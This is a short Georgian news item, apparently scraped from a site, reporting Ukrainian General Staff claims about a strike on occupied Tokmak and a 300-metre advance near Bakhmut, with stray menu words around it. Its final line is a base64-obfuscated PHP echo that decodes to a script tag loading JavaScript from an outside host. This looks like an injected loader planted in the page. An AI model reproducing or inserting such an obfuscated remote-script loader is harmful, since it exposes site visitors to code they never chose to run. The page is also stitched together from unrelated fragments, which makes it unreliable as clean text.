celsiusi
ავერსი საქკაბელი
უკრაინის გენშტაბის ცნობით, 3 იანვარს ოკუპირებული ზაპოროჟიეს ოლქის ქალაქ ტოკმაკზე მიტანილი იერიშის შედეგად დაღუპული და დაშავებული რუსი სამხედროების საერთო რიცხვმა 80 შეადგინა.
თუმცა, როგორც უკრაინის გენშტაბში აცხადებენ, რუსული მხარე დაშავებულების შესახებ ინფორმაციას არ ავრცელებს და მხოლოდ საავადმყოფოს შენობის დაზიანების შესახებ იუწყება.
უკრაინის სასაზღვრო სამსახურის ინფორმაციით, უკრაინელებმა დონეცკის ოლქის ქალაქ​ ბახმუტთან 300 მეტრით წინ წაიწიეს. მათივე ცნობით, ბახმუტთან მიმდინარე საბრძოლო მოქმედებების დროს, რუსი სამხედროები არტილერიის დახმარებით ცდილობდნენ პოზიციების დაკავებას, თუმცა, მოწინააღმდეგის მიახლოებასთან ერთად, უკრაინელი სამხედროების მიერ გახსნილი ცეცხლის გამო, მათ უკან დაიხიეს, რის შემდეგაც უკრაინული ძალები კონტრიერიშზე გადავიდნენ, 300 მეტრით წინ წაიწიეს და პოზიციები გაიმყარეს.
რუსული ძალები ბახმუტის აღებას უკვე ნახევარი წელია, ცდილობენ. 
432
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");